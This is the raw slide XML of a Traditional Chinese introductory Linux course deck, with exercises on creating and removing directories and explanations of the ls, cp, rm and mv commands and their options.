              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>跟目錄下，建立一個目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>bmo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，並進入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>bmo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>目錄。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>跟目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>建立一個目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>bml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>bml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>目錄內再新增一個目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>bm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>跟目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>，建立多重目錄為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”n1/n2/n3”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>最後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>”n3”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>目錄做刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>n1/n2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>用一個指令刪除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3100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118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7530501"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="697285" y="1550072"/>
          <a:ext cx="7763147" cy="396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39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9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93432"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指令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功能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3432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>ls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列出目錄下的所有檔案或目錄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3432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>cp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複製檔案或目錄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3432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
                        <a:t>rm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刪除檔案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3432">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>mv</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
                        <a:t>移動檔案或目錄或更改檔案名稱</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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4400" dirty="0"/>
              <a:t>檔案操作指令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7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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="793800" y="2660760"/>
              <a:ext cx="267120" cy="44640"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="筆跡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7960" y="2597040"/>
                <a:ext cx="2988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2260440" y="2685960"/>
              <a:ext cx="705240" cy="4500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44600" y="2622600"/>
                <a:ext cx="7369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2800440" y="2673360"/>
              <a:ext cx="939960" cy="68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784600" y="2610000"/>
                <a:ext cx="9716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4908600" y="2679840"/>
              <a:ext cx="2584800" cy="3816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892760" y="2616120"/>
                <a:ext cx="261648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793800" y="3435480"/>
              <a:ext cx="501840" cy="129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77960" y="3371760"/>
                <a:ext cx="5335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343240" y="3378240"/>
              <a:ext cx="1333800" cy="3204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27400" y="3314880"/>
                <a:ext cx="1365480" cy="15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4603680" y="3460680"/>
              <a:ext cx="381600" cy="3204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587840" y="3397320"/>
                <a:ext cx="41328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799920" y="4336920"/>
              <a:ext cx="597600" cy="1332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84080" y="4273560"/>
                <a:ext cx="6292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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2165400" y="4273560"/>
              <a:ext cx="1638720" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="筆跡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149560" y="4210200"/>
                <a:ext cx="167040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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="851040" y="5035680"/>
              <a:ext cx="590760" cy="63720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="筆跡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35200" y="4971960"/>
                <a:ext cx="6224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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2317680" y="4997520"/>
              <a:ext cx="1181520" cy="114480"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="筆跡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301840" y="4933800"/>
                <a:ext cx="12132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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4451400" y="5041800"/>
              <a:ext cx="482760" cy="76680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="筆跡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435560" y="4978440"/>
                <a:ext cx="51480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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5600880" y="5092560"/>
              <a:ext cx="2343240" cy="19440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="筆跡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584680" y="5029200"/>
                <a:ext cx="2375280" cy="14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9555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400" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以查詢檔案及目錄相關資訊</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>...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/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>隱藏檔案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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：顯示一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>隱藏檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>所有類型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>，包含訪問權限、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>硬連結數目、擁有者、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、檔案大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>字節</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>和修改時間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>：顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>某個目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>的列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>但不包括其內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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ls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8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1187280" y="3352680"/>
              <a:ext cx="273600" cy="684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71440" y="3289320"/>
                <a:ext cx="30528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1276200" y="3854520"/>
              <a:ext cx="413280" cy="648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60360" y="3790800"/>
                <a:ext cx="444960" cy="13392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文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="2780928"/>
            <a:ext cx="15937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s –al = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ll</a:t>
            </a:r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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2368440" y="2997360"/>
              <a:ext cx="1689480" cy="8892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52600" y="2933640"/>
                <a:ext cx="1721160" cy="21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1156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3400" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令並命名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔可以複製檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>來源檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目的檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：該選項通常在拷貝目錄時使用。它保留鏈接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、檔案屬性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>，並遞歸地拷貝目錄，將檔案狀態、權限等資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>都復制。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>同參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>pdr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：遞歸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>複製檔案和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>子目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t> ：連同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>屬性一起複製</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t> ：若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>為連結屬性則僅複製連結屬性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="300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 err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4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9D9C9-1E4F-4E91-BD47-8FAAE515FF0F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2190600" y="2266920"/>
              <a:ext cx="368640" cy="12960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="筆跡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74760" y="2203560"/>
                <a:ext cx="4006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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3009960" y="2165400"/>
              <a:ext cx="571680" cy="38520"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="筆跡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94120" y="2101680"/>
                <a:ext cx="6033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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4241880" y="2203560"/>
              <a:ext cx="895680" cy="19440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="筆跡 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26040" y="2139840"/>
                <a:ext cx="9273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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5937120" y="2235240"/>
              <a:ext cx="1226160" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="8" name="筆跡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921280" y="2171880"/>
                <a:ext cx="125784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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1276200" y="4883040"/>
              <a:ext cx="292680" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="筆跡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60360" y="4819680"/>
                <a:ext cx="3243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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2114640" y="4863960"/>
              <a:ext cx="3619800" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="筆跡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098800" y="4800600"/>
                <a:ext cx="36514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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1289160" y="5969160"/>
              <a:ext cx="349560" cy="12960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="筆跡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273320" y="5905440"/>
                <a:ext cx="3812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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2978280" y="6022080"/>
              <a:ext cx="1274040" cy="26280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="筆跡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962440" y="5958360"/>
                <a:ext cx="1305720" cy="15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2357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預設簡報設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678</TotalTime>
  <Words>30973</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>3319</Paragraphs>
  <Slides>285</Slides>
  <Notes>282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85</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="297" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>預設簡報設計</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>LINUX作業系統概論</vt:lpstr>
